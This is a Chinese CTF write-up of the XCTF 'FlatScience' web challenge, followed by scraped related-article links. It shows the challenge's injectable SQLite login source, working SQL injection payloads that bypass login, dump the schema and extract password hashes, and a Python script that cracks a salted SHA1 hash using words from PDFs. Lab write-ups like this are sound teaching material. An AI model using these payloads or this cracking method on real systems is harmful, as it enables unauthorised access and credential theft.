FlatScience

  • 题目描述

    啥描述也没有

  • 解题过程

    • 页面有好多链接,除了论文pdf之外,还有子目录下的index.html

      比如:/1/index.html/1/3/index.html

    • 扫了下,有/admin.php,/login.phprobots.txt(里面也是这俩页面)

    • /login.php页面,id加引号有报错,是SQLite3

      ' or 2=2 --直接登录上了,进来是最开始的那个/index.html

      登陆成功会跳转,没有回显,猜测可以进行布尔/延时盲注,以前好像没做过sqlite的注入题,好多关键字和函数都用不了,找的一些payload也用不了,丢给sqlmap跑了一下,可以延时盲注,但这个盲注太慢了(一直出错)

    • 去看了/admin.php,大概是/login.php的加强版,没法注入

    • 到这块思路有点断,只能等比蜗牛还慢的sqlmap跑点东西出来

    • 等结果的时候看了下源码,发现有测试参数

      访问?debug,返回了源码(下面是php部分)

      <?php
      
if(isset($_POST['usr']) && isset($_POST['pw'])){
      
        $user = $_POST['usr'];
      
        $pass = $_POST['pw'];

        $db = new SQLite3('../fancy.db');

        $res = $db->query("SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'");
      
    if($res){
      
        $row = $res->fetchArray();
      
    }
      
    else{
      
        echo "<br>Some Error occourred!";
      
    }

    if(isset($row['id'])){
      
            setcookie('name',' '.$row['name'], time() + 60, '/');
      
            header("Location: /");
      
            die();
      
    }

}

if(isset($_GET['debug']))
      
highlight_file('login.php');
      
?>

      因为/admin.php页面给了用户名是admin,这里看看能不能注处对应的密码

      注意到:

      • user参数对应输入框ID
      • name参数会被写到cookie

      所以可以union select用admin的密码代替name

      ' union select id,password from Users where name='admin' --

      拿到密码是+3fab54a50e770d830c0416df817567662a9dc85c, = =忘了还有sha1

      刚好sqlmap也跑完了,发现只有一个Users

    • 猜测是要用admin账号在/admin.php登录,所以需要拿到密码

      有两个思路

      • 一个是跑出密码

      • 一个是覆盖之前的密码

        INSERT INTO Users(id, name, password) VALUES(999, 'test', '7c4a8d09ca3762af61e59520943dc26494f8941b')发现insert不可用

      • 用上边查密码的方法查了下admin的id=1,

        update Users set password='7c4a8d09ca3762af61e59520943dc26494f8941b' where id=1发现update不可用

    • 到这基本没思路了,跑密码也不能硬跑啊。。。

    • 看wp

      • 确实是队sqlite的了解太少了,这里用到了sqlite自带的结构表sqlite_master

        ' union select name,sql from sqlite_master --+

        得到

        CREATE TABLE Users(
        
    id int primary key,
        
    name varchar(255),
        
    password varchar(255),
        
    hint varchar(255)
        
)

      • 把这几个字段都扒下来

        ' union select id,group_concat(xxx) from Users --+

        name password hint
        admin 3fab54a50e770d830c0416df817567662a9dc85c my fav word in my fav paper?!,
        fritze 54eae8935c90f467427f05e4ece82cf569f89507 my love is … ?
        hans 34b0bb7c304949f9ff2fc101eef0f048be10d3bd the password is password

      • 看hint的意思,密码是paper里的一个单词

        回过头去看这些paper的链接,没啥不同的,都下载下来吧

      • 贴个处理pdf的代码,偷懒copy了一份,然后调好了bug(python3)

        from pdfminer.pdfparser import PDFParser
        
from pdfminer.pdfdocument import PDFDocument
        
from pdfminer.pdfpage import PDFPage
        
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
        
from pdfminer.converter import PDFPageAggregator
        
from pdfminer.layout import LTTextBoxHorizontal, LAParams
        
import logging
        
import hashlib
        
import re
        
import os

def pdf_2_txt(start, end):
        
    pdf_filename = start
        
    txt_filename = end
        
    # 不显示warning
        
    logging.propagate = False
        
    logging.getLogger().setLevel(logging.ERROR)
        
    device = PDFPageAggregator(PDFResourceManager(), laparams=LAParams())
        
    interpreter = PDFPageInterpreter(PDFResourceManager(), device)
        
    parser = PDFParser(open(pdf_filename, 'rb'))
        
    doc = PDFDocument(parser)
        
    parser.set_document(doc)
        
    # 检测文档是否提供txt转换,不提供就忽略
        
    if not doc.is_extractable:
        
        pass
        
    else:
        
        with open(txt_filename, 'w+', encoding="utf-8") as fw:
        
            print("num page:{}".format(len(list(PDFPage.create_pages(doc)))))
        
            for page in PDFPage.create_pages(doc):
        
                interpreter.process_page(page)
        
                layout = device.get_result()
        
                for x in layout:
        
                    if isinstance(x, LTTextBoxHorizontal):
        
                        results = x.get_text()
        
                        fw.write(results)

def get_pwd():
        
    for a in range(1, 31):
        
        f = open(filePath + '\\txt\\' + str(a) + ".txt", "r", encoding='UTF-8').read()
        
        wordlist = re.split(" |\n", f)

        for s in wordlist:
        
            y = s + "Salz!"
        
            encode = hashlib.sha1(y.encode('utf-8')).hexdigest()
        
            if encode == "3fab54a50e770d830c0416df817567662a9dc85c":
        
                print("password is :" + s)
        
                break

if __name__ == '__main__':
        
    filePath = ''  # 绝对路径
        
    lists = os.listdir(filePath)

    for i in range(1, 31):
        
        x = filePath + '\\' + lists[i - 1]
        
        pdf_2_txt(x, filePath + '\\txt\\' + str(i) + '.txt')  # 在目录下创建一个txt文件夹

  • 参考

    https://blog.csdn.net/qq_42967398/article/details/103480502

    https://www.e-learn.cn/topic/2155194

    https://www.cnblogs.com/xiaozi/p/5760321.html

XCTF-FlatScience的更多相关文章

  1. 攻防世界(XCTF)WEB(进阶区)write up(三)

    挑着做一些好玩的ctf题 FlatScience web2 unserialize3upload1wtf.sh-150ics-04web i-got-id-200 FlatScience 扫出来的lo ...

  2. 攻防世界(XCTF)WEB(进阶区)write up(四)

    ics-07  Web_php_include  Zhuanxv Web_python_template_injection ics-07 题前半部分是php弱类型 这段说当传入的id值浮点值不能为1 ...

  3. 攻防世界(XCTF)WEB(进阶区)write up(一)

      cat ics-05 ics-06 lottery Cat XCTF 4th-WHCTF-2017 输入域名  输入普通域名无果  输入127.0.0.1返回了ping码的结果 有可能是命令执行 ...

  4. XCTF攻防世界Web之WriteUp

    XCTF攻防世界Web之WriteUp 0x00 准备 [内容] 在xctf官网注册账号,即可食用. [目录] 目录 0x01 view-source2 0x02 get post3 0x03 rob ...

  5. xctf进阶-unserialize3反序列化

    一道反序列化题: 打开后给出了一个php类,我们可以控制code值: `unserialize()` 会检查是否存在一个 `__wakeup()` 方法.如果存在,则会先调用 `__wakeup` 方 ...

  6. 日常破解--从XCTF的app3题目简单了解安卓备份文件以及sqliteCipher加密数据库

    一.题目来源     题目来源:XCTF app3题目 二.解题过程     1.下载好题目,下载完后发现是.ab后缀名的文件,如下图所示:     2.什么是.ab文件?.ab后缀名的文件是Andr ...

  7. 日常破解--XCTF easy_apk

    一.题目来源     来源:XCTF社区安卓题目easy_apk 二.破解思路     1.首先运行一下给的apk,发现就一个输入框和一个按钮,随便点击一下,发现弹出Toast验证失败.如下图所示: ...

  8. XCTF练习题-WEB-webshell

    XCTF练习题-WEB-webshell 解题步骤: 1.观察题目,打开场景 2.根据题目提示,这道题很有可能是获取webshell,再看描述,一句话,基本确认了,观察一下页面,一句话内容,密码为sh ...

  9. 【Hack.lu-2017】FlatScience

    信息: 题目来源:Hack.lu-2017 标签:SQL注入.源码泄露 解题过程 题目页面有多层,存在许多pdf文件,首先进行目录扫描: [TIME] => 2020-07-07 16:08:5 ...

  10. 【XCTF】ics-04

    信息: 题目来源:XCTF 4th-CyberEarth 标签:PHP.SQL注入 题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag 解题过程 进入注册页面,尝试注册: 进行登录 ...

随机推荐

  1. windows程序员开发linux程序的头一个月

    开发环境选择 vim,vscode,qt,visual studio都可以做linux c++开发,但是作为windows程序员,最熟悉的还是visual stuio,加上visual studio ...

  2. Java__包机制__用户输入

    包机制 包机制的存在是为了解决当定义了多个类的时候,可能会出现类名重复的问题,包机制的存在可以解决这一冲突. 包的作用 把功能相似的类或者相关接口组织在同一个包里,方便再查找. 包名可以避免名字冲突. ...

  3. 利用浏览器favicon的缓存机制(F-Cache)生成客户端浏览器唯一指纹

    利用浏览器favicon的缓存机制(F-Cache)生成客户端浏览器唯一指纹 首先介绍下: 这个技术出自 UIC论文:https://www.cs.uic.edu/~polakis/papers/so ...

  4. .Net Core3.1中SameSite的使用方法、遇到的问题以及解决办法

    一.关于SameSite的介绍 1.  什么是SameSite? SameSite是浏览器请求中Set-Cookie响应头新增的一种属性,它用来标明这个 cookie 是否是"同站 cook ...

  5. Typora标题自动编号+设定快捷键技巧

    Typora标题自动编号 提示:要了解将这些CSS片段放在哪里,请参阅添加自定义CSS. 打开Typora偏好设置,打开主题文件夹,在主题文件夹中创建base.user.css文件,放置以下内容,则T ...

  6. 全网最详细的新手入门Mysql命令和基础,小白必看!

    MySQL简介 什么是数据库 ? 数据库(Database)是按照数据结构来组织.存储和管理数据的仓库,它产生于距今六十多年前,随着信息技术和市场的发展,特别是二十世纪九十年代以后,数据管理不再仅仅是 ...

  7. kubernetes:基于ab的压力测试

    基于ab的压力测试 # cat apache-test.yaml ################################################################### ...

  8. SQL语句练习(基础版)

    最近在学习SQL基本语句的练习,在此分享一下笔者做过的练习以及个人的解决教程: 首先是基本练习表格的搭建,具体内容如下表所示: Snum Sname Ssex Sage Sphone Dname S0 ...

  9. 2-69.x的平方根

    题目描述: 解题思路: 计算平方根可以依次通过自然数递增,来判断两者相乘是否为目标值,是一个有序的序列,因此考虑使用二分查找. 由于x=0和1时,就是其本身,单独拿出来.当x>1时,其平方根一定 ...

  10. Redis深入理解

    Redis Redis的三种集群方式 主从复制 原理 从服务器连接主服务器,发送sync(同步)命令 主服务器接收到sync命令后,开始执行bgsave命令生成RDB文件并使用缓存区记录此后执行的所有 ...